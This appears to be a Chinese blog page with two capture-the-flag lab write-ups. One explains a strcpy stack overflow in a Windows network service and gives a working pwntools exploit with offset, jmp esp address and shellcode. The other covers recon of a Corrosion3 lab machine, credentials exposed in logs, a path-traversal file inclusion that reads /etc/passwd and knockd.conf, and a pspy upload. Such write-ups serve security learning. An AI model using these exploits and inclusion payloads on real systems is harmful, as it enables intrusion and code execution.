  iVar1 = _WSAStartup@8(0x202,&local_5ac);
  if (iVar1 == 0) {
    printf("done.\n");
    local_5b0 = socket(2,1,0);
    if (local_5b0 == 0xffffffff) {
      iVar1 = _WSAGetLastError@0();
      printf("[!] could not create socket: %d",iVar1);
    }
    printf("[+] server socket created.\n");
    local_5cc.sa_family = 2;
    local_5cc.sa_data[2] = '\0';
    local_5cc.sa_data[3] = '\0';
    local_5cc.sa_data[4] = '\0';
    local_5cc.sa_data[5] = '\0';
    local_5cc.sa_data._0_2_ = htons(9999);
    iVar1 = bind(local_5b0,&local_5cc,0x10);
    if (iVar1 == -1) {
      iVar1 = _WSAGetLastError@0();
      printf("[!] bind failed: %d",iVar1);
    }
    printf("[+] bind done on port %d\n",local_410);
    listen(local_5b0,3);
    printf("[+] waiting for connections.\n");
    local_40c = 0x10;
    while (local_5b4 = accept(local_5b0,&local_5dc,&local_40c), local_5b4 != 0xffffffff) {
      printf("[+] received connection.\n");
      memset(local_3fc,0,1000);
      iVar1 = strlen(local_400);
      send(local_5b4,local_400,iVar1,0);
      recv(local_5b4,local_3fc,1000,0);
      local_414 = get_reply(local_3fc);
      printf("[+] check is %d\n",local_414);
      iVar1 = get_reply(local_3fc);
      if (iVar1 == 0) {
        iVar1 = strlen(local_404);
        send(local_5b4,local_408,iVar1,0);
      }
      else {
        iVar1 = strlen(local_408);
        send(local_5b4,local_404,iVar1,0);
      }
      closesocket(local_5b4);
    }
    iVar1 = _WSAGetLastError@0();
    printf("[!] accept failed: %d",iVar1);
  }
  else {
    iVar1 = _WSAGetLastError@0();
    printf("[!] winsock init failed: %d",iVar1);
  }
  return 1;
}

void get_reply(char *param_1)
{
    printf("[get_reply] s = [%s]\n", param_1);
    strcpy(local_buffer, param_1);          // ⚠️ 栈溢出漏洞！
    param1 = strlen(local_buffer);
    printf("[get_reply] copied %d bytes to buffer\n", param1);
    strcmp(local_buffer, "shitstorm\n");
}

关键信息：

strcpy() 无长度检查
recv() 接收最多1000字节
local_buffer 是栈上的局部变量

一、从反编译代码开始（这是唯一正确的起点）

你给的 get_reply 反编译结果是完全正确的：

int __cdecl get_reply(char *Source)
{
  size_t v1; // eax
  char Dest; // [esp+10h] [ebp-208h]

  printf("[get_reply] s = [%s]\n", Source);
  strcpy(&Dest, Source);
  v1 = strlen(&Dest);
  printf("[get_reply] copied %d bytes to buffer\n", v1);
  return strcmp(&Dest, "shitstorm\n");
}

这里我们只看三行：

char Dest;                 // 栈上缓冲区
strcpy(&Dest, Source);     // 无长度检查
return strcmp(&Dest, ...); // 之后还会返回

结论 1（漏洞定性）：

这是一个标准的栈溢出函数，利用点 100% 成立

这一点你没有任何问题。

二、Dest 到底有多大？（这是 offset 的数学来源）

关键是这一行：

char Dest; // [ebp-208h]

这句话不是“一个 char”，而是 一个以 **ebp-0x208** 为起始的缓冲区

结合函数栈结构：

高地址
[ RET ]        <- EIP
[ saved EBP ]
[ Dest buffer ]  <- 从 ebp-0x208 开始
低地址

关键计算（这是整个 exp 的“根”）：

Dest 起始地址：EBP - 0x208
返回地址 RET：EBP + 4

所以 从 Dest 到 RET 的字节数是：

(EBP + 4) - (EBP - 0x208)
= 0x208 + 4
= 0x20C
= 524 字节

结论 2（offset 精确来源）：

覆盖 RET 需要 524 字节 junk

这就是你写的：

junk = b'a' * 524

不是猜的，不是试的，是栈布局直接算出来的。

三、为什么 strcpy 一定能覆盖到 RET？

因为：

recv(sock, buf, 1000, 0);

而 Dest 只有：

0x208 = 520 字节

recv 允许你送 1000 字节，strcpy 不检查长度：

你至少可以覆盖到：

buffer
saved EBP
RET
RET 后的栈内容

结论 3（利用可达性）：

EIP 可控是必然的，不是可能

四、ret_addr 是怎么“合法”找出来的？

你做了两次交叉验证，这一步是教科书级别正确。

1️⃣ ropper 搜索

ropper --file brainfuck.exe --search 'jmp esp'

结果：

0x311712f3: jmp esp;

2️⃣ objdump 再确认一次

objdump -D brainfuck.exe | grep jmp | grep esp

结果：

311712f3: ff e4  jmp *%esp

结论 4（控制流接管点）：

**0x311712f3 是一个真实存在、可执行、无歧义的 ****jmp esp**

这一步没有任何问题。

五、为什么 payload 结构必须是这样？

你最终的 payload 是：

payload = junk + ret_addr + shellcode

我们按 CPU 执行顺序解释：

① `junk = 'a' * 524`

覆盖 Dest
覆盖 saved EBP
正好覆盖到 RET 前一字节

② `ret_addr = 0x311712f3`

RET 被覆盖后，函数 ret 等价于：

EIP = 0x311712f3

而这条指令是：

jmp esp

③ `jmp esp` 跳到哪里？

此时 ESP 指向哪里？

就在：

RET 后面的内容

也就是：

shellcode

结论 5（执行流闭环）：

RET → jmp esp → shellcode

控制流是完全闭合的，没有缺口

Exp

from pwn import *

context.update(os='linux', arch='i386')
target_ip = '192.168.10.102'
target_port = 9999

junk = b'a' * 524
ret_addr = p32(0x311712f3)
# execve("/bin/sh") shellcode（32位）
shellcode = asm(shellcraft.sh())

payload = junk + ret_addr + shellcode

try:
    conn = remote(target_ip, target_port)
    conn.recvuntil(b'>>')
    
    # 发送 Payload
    conn.send(payload)
    log.info(f"[+] Exploit!!!!!")
    conn.interactive()
   
except Exception as e:
    log.error(f"[-] Exploit failed: {e}")
finally:
    conn.close()

cat root.txt
BoFsavetheworld

补充知识

1️⃣ 寄存器 = CPU 自己口袋里的变量

寄存器是：

极小
极快
数量很少

在 32 位 x86 里，你现在只需要认识这几个：

寄存器	作用（人话）
EIP	下一条要执行的指令地址
ESP	栈顶在哪里
EBP	当前函数的“参考点”
EAX	临时变量 / 返回值

👉 你现在只要记住前三个

2️⃣ 最重要的一个寄存器：EIP

EIP 决定“程序下一步去哪”

EIP = 0x1234
→ CPU 去 0x1234 执行指令

所以在 pwn 里一句话就是：

谁能控制 EIP，谁就能控制程序

第三层：什么是栈？（不讲内存模型）

1️⃣ 栈是“函数用的草稿纸”

当函数被调用时：

会在栈上放：
- 局部变量
- 返回地址
- 一些临时数据

你可以把栈画成一列盒子：

高地址
┌──────────┐
│ 返回地址 │ ← EIP 从这里来
├──────────┤
│ 旧 EBP   │
├──────────┤
│ 局部变量 │ ← strcpy 写的地方
└──────────┘
低地址

2️⃣ ESP 和 EBP 是干嘛的？

ESP：指向“最上面的盒子”
EBP：指向“这一摞盒子的固定参考点”

EBP 的作用一句话：

“让我能找到自己的局部变量和返回地址”

第四层：函数返回发生了什么？（超级关键）

当一个函数结束时，会执行两步：

leave
ret

你现在不用记指令，只记效果：

`ret` 干了什么？

从栈里取一个 4 字节地址，放进 EIP

也就是：

EIP = *(ESP)

💥 这就是漏洞利用的入口。

第五层：什么是“栈溢出”？

你看这行代码：

strcpy(Dest, Source);

人话翻译：

不停地把 Source 的内容复制到 Dest，直到遇到 \0

但 Dest 在栈上，大小是有限的。

如果 Source 太长：

Dest 的空间 → 写完了
继续写 → 覆盖旧 EBP
继续写 → 覆盖返回地址（RET）

⚠️ 一旦返回地址被覆盖：

ret 取到的是“你写进去的东西”

于是：

你控制了 EIP

我们用一句话串起来：

strcpy 写爆栈 → 覆盖返回地址 → ret 把你写的值放进 EIP → CPU 跳到你指定的位置执行

那 `jmp esp` 是干嘛的？

你之前问：

ropper --search 'jmp esp' 是为什么？

现在答案你应该能接受了：

你控制了 EIP
你不知道 shellcode 在哪
但 ESP 一定指向你的数据

jmp esp 的作用就是：

EIP = ESP

也就是：

“跳到我现在这堆栈数据里执行”

为什么ESP一定指向你的数据

因为你的输入是通过函数参数被拷贝到栈上的，而栈顶（ESP）正好就在这片区域附近

第一步：你的数据是“怎么进程序的”？

你现在的程序是 网络服务，流程本质是：

socket recv → 把你发的数据放到一个 buffer → 传给 get_reply

于是 get_reply(char *Source) 里的 Source：

指向的内容
就是你从网络发过去的字节

✅ 这是第一件事：
你的输入已经在内存里了

第二步：`Dest` 在哪里？（这是关键）

反编译结果：

char Dest; // [esp+10h] [ebp-208h]

这句话信息量巨大，我们翻译成“人话”。

`[ebp-208h]` 是什么意思？

EBP：当前函数的“参考点”
Dest：在 EBP 下面 0x208 字节的位置

也就是说：

EBP
│
├── 返回地址
├── 旧 EBP
├── ...
├── Dest[???]   ← 你的数据从这里开始写

👉 Dest 在栈上

第三步：`strcpy` 干了什么“坏事”？

strcpy(&Dest, Source);

strcpy 的规则只有一条：

我不管你 Dest 多大，我一直复制，直到 Source 遇到 \0

所以当你输入很长时，内存会变成这样：

[ Dest buffer        ]  ← aaaaaaaa
[ 覆盖的其他局部变量 ]  ← aaaaaaaa
[ 覆盖的旧 EBP       ]  ← aaaaaaaa
[ 覆盖的返回地址 RET ]  ← 0x311712f3
[ 后续数据           ]  ← shellcode

⚠️ 注意：shellcode 就在返回地址后面

第四步：函数“返回”的瞬间发生了什么？

函数结束时，会执行：

ret

ret 做的事情只有一件：

从 ESP 指向的位置取 4 字节 → 放进 EIP

那这时 ESP 指向哪？

这是重点👇

在 ret 之前，栈长这样：

ESP → [ 返回地址（被你覆盖） ]
       [ shellcode 字节 1 ]
       [ shellcode 字节 2 ]
       [ shellcode 字节 3 ]
       ...

当 ret 执行：

CPU 从 [ESP] 取地址 → EIP
ESP 自动 +4

于是变成：

ESP → [ shellcode 的起始位置 ]

💥 这就是关键结论

第五步：所以为什么 `ESP 一定指向你的数据`？

现在我们可以严谨地说了：

因为：

你的输入被 strcpy 写进了栈
返回地址后面紧跟着的就是你输入的内容
ret 会让 ESP 指向 返回地址后 4 字节
那里正是你的 shellcode

✅ 所以：

在 ret 之后，ESP 指向的，就是你刚刚写进去的数据

第六步：这就是为什么 `jmp esp` 是“完美跳板”

你现在应该能真正理解这句话了：

jmp esp

人话翻译：

“不管你 shellcode 在哪，我就跳到 ESP 指向的地方”

而 ESP 指向哪里？

指向你写在栈上的 payload

用一句完整链总结（非常重要）

strcpy 溢出 → 覆盖返回地址 → ret 后 ESP 指向 shellcode → 返回地址设为 jmp esp → EIP 跳到 ESP → 执行你的代码

这就是你整个 EXP 的数学证明级解释。

总结

✔ 524 字节是为了覆盖到返回地址
✔ **返回地址被我们控制成 ****jmp esp**
✔ 最终会执行 shellcode

① 覆盖栈帧（为什么是 524）

在 get_reply 中：

char Dest; // [ebp-0x208]

栈结构是：

[ Dest buffer  ] 0x208 = 520 bytes
[ saved EBP    ] 4 bytes
[ RET address  ] 4 bytes

👉 到返回地址的偏移：

520 + 4 = 524

所以：

junk = b"A" * 524

这一句的本质是：

把返回地址“踩掉”

② ret 做的事情（这一点你要永远记住）

函数结束时执行：

leave
ret

ret 的真实行为：

EIP = [ESP]
ESP = ESP + 4

所以当你把返回地址写成：

ret_addr = p32(0x311712f3)  # jmp esp

执行 ret 后：

EIP = jmp esp
ESP自动指向返回地址后面的内容

③ 为什么 shellcode 一定要放在 ret 后面？

你的 payload 是：

[ A * 524 ][ jmp esp ][ shellcode ]

执行 ret 后：

ESP → shellcode
EIP → jmp esp

然后 CPU 执行：

jmp esp

含义是：

跳到 ESP 当前指向的位置

而 ESP 正好指向 shellcode

④ 所以完整链路是（这是终极版本）

strcpy 溢出 ↓ 覆盖返回地址 ↓ ret → EIP = jmp esp ↓ ESP 自动指向 shellcode ↓ jmp esp → 跳到 shellcode ↓ shellcode 执行

因为在 32 位程序里，一个地址 = 4 个字节，而 **ret** 就是从栈里“弹出一个地址”。

**弹出一个地址 = 4 字节
**所以：ESP = ESP + 4

为什么“一个地址是 4 字节”？

你现在分析的是：

PE32 executable
Intel 80386
i386

也就是 32 位程序

在 32 位 CPU 中：

寄存器宽度：32 bit
32 bit = 4 byte

所以：

东西	大小
int	4 字节
指针	4 字节
返回地址	4 字节
EIP	4 字节

👉 返回地址本身就是一个“指针”

ret 本质上是在“弹栈”

你要把 ret 当成一句 伪代码：

EIP = *(uint32_t *)ESP;
ESP += 4;

翻译成人话就是：

从 ESP 指向的地方，取 4 字节
当成下一条要执行的地址（给 EIP）
ESP 往上挪 4 字节（栈顶弹出）

用真实栈内存给你画一遍（关键）

假设当前 ESP = `0xffffd200`

内存里是这样：

地址        内容
--------------------------------
0xffffd200  f3 12 17 31   ← 返回地址（jmp esp）
0xffffd204  31 c0 50 68   ← shellcode 第 1 条
0xffffd208  2f 2f 73 68

执行 `ret` 时：

第一步：

EIP = *(0xffffd200)
EIP = 0x311712f3

第二步：

ESP = ESP + 4
ESP = 0xffffd204

📌 注意：

ESP 现在 = shellcode 的起始地址

这就是为什么 shellcode 会“紧挨着 ESP”

不是因为 shellcode 特殊，而是：

ret 只弹出返回地址
返回地址占 4 字节
ESP 必须跳过它
所以后面的数据自然就成了 ESP 指向的内容

👉 这是 CPU 的铁律，不是技巧

类比一个“你肯定懂”的东西（很重要）

把栈想成一摞盘子：

最上面
┌──────────────┐
│ 返回地址     │  ← 1 个盘子（4 字节）
├──────────────┤
│ shellcode    │
│ shellcode    │
└──────────────┘

ret = 拿走最上面一个盘子

拿走返回地址
手自然就放到下面那一层

👉 ESP 就是“你的手”

你现在应该能自己回答这个问题了

为什么 ESP = ESP + 4？

因为：

栈里存的是 32 位返回地址
32 位 = 4 字节
ret 要把这个地址“弹掉”
所以 ESP 必须前进 4 字节

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/deba/

HMV-Corrosion3

呼啸山庄 — Sun, 11 Jan 2026 00:00:00 GMT

信息收集

ip定位

mac:08002768AFB1

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l -I eth0 | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
172.16.53.30    08:00:27:63:fc:c5       (Unknown)

nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 172.16.53.30 
Nmap scan report for 172.16.53.30
Host is up (0.00039s latency).
Not shown: 65535 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.12 seconds

居然只有一个80端口

80端口

根目录扫描

dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://172.16.53.30/      
  _|. _ _  _  _  _ _|_    v0.4.3                                               
 (_||| _) (/_(_|| (_| )                                                        
                                                                               
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlis

Output File: /home/kali/reports/http_172.16.53.30/__25-12-27_01-43-24.txt

Target: http://172.16.53.30/

[01:43:24] Starting:                                                           
[01:43:49] 301 -  314B  - /website  ->  http://172.16.53.30/website/

gobuster

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://172.16.53.30 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js -t 64  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.53.30
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip,db,bak,js,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10918]
/.php                 (Status: 403) [Size: 277]
/website              (Status: 301) [Size: 314] [--> http://172.16.53.30/website/]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1764472 / 1764480 (100.00%)
===============================================================
Finished
===============================================================

/website目录扫描

dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://172.16.53.30/website 
  _|. _ _  _  _  _ _|_    v0.4.3                                               
 (_||| _) (/_(_|| (_| )                                                        
                                                                               
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/http_172.16.53.30/_website_25-12-27_01-49-29.txt

Target: http://172.16.53.30/

[01:49:29] Starting: website/                                                  
[01:49:31] 403 -  277B  - /website/.ht_wsr.txt                              
[01:49:31] 403 -  277B  - /website/.htaccess.bak1                           
[01:49:31] 403 -  277B  - /website/.htaccess.sample                         
[01:49:31] 403 -  277B  - /website/.htaccess.orig                           
[01:49:31] 403 -  277B  - /website/.htaccess.save
[01:49:31] 403 -  277B  - /website/.htaccess_extra                          
[01:49:31] 403 -  277B  - /website/.htaccess_orig
[01:49:31] 403 -  277B  - /website/.htaccessBAK
[01:49:31] 403 -  277B  - /website/.htaccess_sc
[01:49:31] 403 -  277B  - /website/.htaccessOLD2                            
[01:49:31] 403 -  277B  - /website/.htaccessOLD
[01:49:31] 403 -  277B  - /website/.htm                                     
[01:49:31] 403 -  277B  - /website/.html                                    
[01:49:31] 403 -  277B  - /website/.htpasswd_test                           
[01:49:31] 403 -  277B  - /website/.htpasswds
[01:49:31] 403 -  277B  - /website/.httr-oauth
[01:49:32] 403 -  277B  - /website/.php                                     
[01:49:41] 200 -  493B  - /website/assets/                                  
[01:49:41] 301 -  321B  - /website/assets  ->  http://172.16.53.30/website/assets/
[01:49:53] 301 -  319B  - /website/logs  ->  http://172.16.53.30/website/logs/
[01:49:53] 200 -  485B  - /website/logs/                                    
                                                                             
Task Completed

gobuster

──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://172.16.53.30/website -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.53.30/website
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,zip,db,bak,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 52549]
/assets               (Status: 301) [Size: 321] [--> http://172.16.53.30/website/assets/]                                                                     
/logs                 (Status: 301) [Size: 319] [--> http://172.16.53.30/website/logs/]                                                                       
/License.txt          (Status: 200) [Size: 1989]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/sales_detail.php     (Status: 200) [Size: 0]
Progress: 1764472 / 1764480 (100.00%)
===============================================================
Finished
===============================================================

/website/assets/

[DIR] css/ 2016-04-06 11:23 -

[DIR] fonts/ 2016-04-06 11:19 -

[DIR] images/ 2016-04-06 11:49 -

[DIR] js/ 2016-04-06 11:13 -

/website/logs/

[PARENTDIR] Parent Directory -

[ ] login_request.log 2022-01-30 21:10 446

[ ] login_request1.log 2022-01-30 21:11 422

POST /login/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
Upgrade-Insecure-Requests: 1

user=randy&pass=RaNDY$SuPer!Secr3etPa$$word

POST /login/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
Upgrade-Insecure-Requests: 1

user=test&pass=test

查看后看到两组明文用户名和密码

test/test
randy/RaNDY$SuPer!Secr3etPa$$word

IP更换

换了个ip

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.107   08:00:27:b2:75:17       (Unknown)

Fuzz

Post

尝试在/website/sales_detail.php 页面进行Post传参

无响应

fuff

利用fuff工具进行页面fuzz

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.0.107/website/sales_detail.php?FUZZ=../index.html -fs 0  -v

┌──(root㉿kali)-[/home/kali]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.0.107/website/sales_detail.php?FUZZ=../index.html -fs 0 -v 


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.107/website/sales_detail.php?FUZZ=../index.html
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

:: Progress: [3/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: E:: Progress: [866/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :::: Progress: [1789/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::: Progress: [2706/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::: Progress: [3685/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::: Progress: [4657/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :[Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 2ms]
| URL | http://192.168.0.107/website/sales_detail.php?shared=../index.html
    * FUZZ: shared

:: Progress: [5188/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::: Progress: [5561/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::: Progress: [6392/6453] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::: Progress: [6453/6453] :: Job [1/1] :: 6666 req/sec :: Duration: [0:00:01:: Progress: [6453/6453] :: Job [1/1] :: 51 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

http://192.168.0.107/website/sales_detail.php?shared=../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:117:123::/var/lib/saned:/usr/sbin/nologin nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false whoopsie:x:120:125::/nonexistent:/bin/false colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false sssd:x:126:131:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin randy:x:1000:1000:randy,,,:/home/randy:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin sshd:x:127:65534::/run/sshd:/usr/sbin/nologin bob:x:1001:1001::/home/bob:/bin/sh

之前web页面已经拿到randy用户的密码了，但是ssh端口可能不是打开的，是filtered或者没扫出。这是靶机设置knock的缘故。

包含knock的配置文件，查看knock顺序，顺序是：1110 2220 3330

[http://192.168.0.107/website/sales_detail.php?shared=../../../../../../etc/knockd.conf](http://192.168.0.107)

[options] UseSyslog [openSSH] sequence = 1110,2220,3330 seq_timeout = 20 tcpflags = syn command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT [closeSSH] sequence = 3330,2220,1110 seq_timeout = 20 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn

nmap二次扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-11 08:38 EST
Nmap scan report for 192.168.0.107
Host is up (0.00062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a3:1b:b2:23:b2:b1:3e:49:64:aa:1d:60:35:ad:b5:4d (RSA)
|   256 8f:81:4a:65:aa:50:a3:97:c9:e9:1b:18:e8:a8:18:46 (ECDSA)
|_  256 2f:8f:88:82:54:b2:97:53:62:7e:c9:1d:53:bb:74:c9 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.26 seconds

提权-BOB

给靶机上传pspy64文件扫描靶机

👉 它可以在没有 root 权限的情况下，实时监控系统中新启动的进程、定时任务、脚本执行情况。

工具地址：https://github.com/DominicBreuker/pspy

wget 192.168.159.127:8888/pspy64

┌──(kali㉿kali)-[~/Desktop/tools/pspy]
└─$ ls
pspy32  pspy64
                                                                                              
┌──(kali㉿kali)-[~/Desktop/tools/pspy]
└─$ scp pspy64 randy@192.168.0.107:/tmp/

randy@corrosion:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2026/01/11 07:58:55 CMD: UID=1000  PID=1706   | ./pspy64 
